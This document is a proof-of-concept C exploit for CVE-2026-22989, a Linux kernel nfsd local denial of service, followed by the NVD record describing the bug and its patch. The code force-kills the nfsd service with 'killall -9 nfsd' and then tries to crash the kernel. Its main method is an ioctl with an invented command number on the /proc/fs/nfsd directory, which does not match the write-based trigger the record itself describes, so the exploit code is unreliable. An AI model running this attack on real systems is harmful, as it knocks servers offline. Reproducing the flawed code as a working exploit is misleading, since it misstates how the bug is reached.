CVE-2026-22989

// CVE-2026-22989 PoC - Local DoS via unlock_filesystem // This PoC demonstrates triggering the nfsd crash when nfsd is not running #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> // NFSCTL unlock filesystem ioctl command #define NFSCTL_UNLOCK 0x8 int main() { int fd; printf("[*] CVE-2026-22989 PoC - nfsd Local DoS\n"); printf("[*] Target: Linux Kernel nfsd unlock_filesystem\n"); // Open nfsd control interface fd = open("/proc/fs/nfsd", O_RDONLY); if (fd < 0) { // Try alternative path fd = open("/sys/fs/nfsd", O_RDONLY); } if (fd < 0) { printf("[!] Cannot open nfsd interface. Try running as root.\n"); return 1; } printf("[*] Opened nfsd interface\n"); // Stop nfsd service first (simulate shutdown) printf("[*] Stopping nfsd service...\n"); system("systemctl stop nfsd 2>/dev/null || service nfs stop 2>/dev/null || killall -9 nfsd 2>/dev/null"); sleep(1); // Trigger the vulnerable code path printf("[*] Attempting to unlock filesystem (triggering crash)...\n"); if (ioctl(fd, NFSCTL_UNLOCK, 0) < 0) { printf("[!] ioctl failed (kernel may have crashed already)\n"); } close(fd); printf("[*] PoC execution completed\n"); return 0; } // Alternative PoC using sysfs interface /* #include <stdio.h> #include <string.h> int main() { FILE *fp; printf("[*] CVE-2026-22989 PoC - nfsd unlock_filesystem DoS\n"); // Stop nfsd system("systemctl stop nfsd"); // Write to unlock_filesystem interface fp = fopen("/proc/fs/nfsd/unlock_filesystem", "w"); if (fp) { fprintf(fp, "1"); // Trigger unlock fclose(fp); } return 0; } */

{"cve": {"id": "CVE-2026-22989", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T16:15:54.970", "lastModified": "2026-02-26T18:51:04.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: check that server is running in unlock_filesystem\n\nIf we are trying to unlock the filesystem via an administrative\ninterface and nfsd isn't running, it crashes the server. This\nhappens currently because nfsd4_revoke_states() access state\nstructures (eg., conf_id_hashtbl) that has been freed as a part\nof the server shutdown.\n\n[ 59.465072] Call trace:\n[ 59.465308] nfsd4_revoke_states+0x1b4/0x898 [nfsd] (P)\n[ 59.465830] write_unlock_fs+0x258/0x440 [nfsd]\n[ 59.466278] nfsctl_transaction_write+0xb0/0x120 [nfsd]\n[ 59.466780] vfs_write+0x1f0/0x938\n[ 59.467088] ksys_write+0xfc/0x1f8\n[ 59.467395] __arm64_sys_write+0x74/0xb8\n[ 59.467746] invoke_syscall.constprop.0+0xdc/0x1e8\n[ 59.468177] do_el0_svc+0x154/0x1d8\n[ 59.468489] el0_svc+0x40/0xe0\n[ 59.468767] el0t_64_sync_handler+0xa0/0xe8\n[ 59.469138] el0t_64_sync+0x1ac/0x1b0\n\nEnsure this can't happen by taking the nfsd_mutex and checking that\nthe server is still up, and then holding the mutex across the call to\nnfsd4_revoke_states()."}, {"lang": "es", "value": "Se ha resuelto la siguiente vulnerabilidad en el kernel de Linux:\n\nnfsd: comprobar que el servidor está en ejecución en unlock_filesystem\n\nSi estamos intentando desbloquear el sistema de archivos a través de una interfaz de administración y nfsd no está en ejecución, se provoca la caída del servidor. Esto ocurre actualmente porque nfsd4_revoke_states() accede a estructuras de estado (por ejemplo, conf_id_hashtbl) que han sido liberadas como parte del apagado del servidor.\n\n[ 59.465072] Traza de llamada:\n[ 59.465308] nfsd4_revoke_states+0x1b4/0x898 [nfsd] (P)\n[ 59.465830] write_unlock_fs+0x258/0x440 [nfsd]\n[ 59.466278] nfsctl_transaction_write+0xb0/0x120 [nfsd]\n[ 59.466780] vfs_write+0x1f0/0x938\n[ 59.467088] ksys_write+0xfc/0x1f8\n[ 59.467395] __arm64_sys_write+0x74/0xb8\n[ 59.467746] invoke_syscall.constprop.0+0xdc/0x1e8\n[ 59.468177] do_el0_svc+0x154/0x1d8\n[ 59.468489] el0_svc+0x40/0xe0\n[ 59.468767] el0t_64_sync_handler+0xa0/0xe8\n[ 59.469138] el0t_64_sync+0x1ac/0x1b0\n\nAsegurar que esto no pueda ocurrir tomando el nfsd_mutex y comprobando que el servidor sigue activo, y luego manteniendo el mutex durante la llamada a nfsd4_revoke_states()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.9", "versionEndExcluding": "6.12.66", "matchCriteriaId": "49616A55-2473-4303-ADBB-059630B30A6F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.6", "matchCriteriaId": "879529BC-5B4C-4EBE-BF1D-1A31404A8B2E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/d0424066fcd294977f310964bed6f2a487fa4515", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d95499900fe52f3d461ed26b7a30bebea8f12914", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e06c9f6c0f554148d4921c2a15bd054260a054ac", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}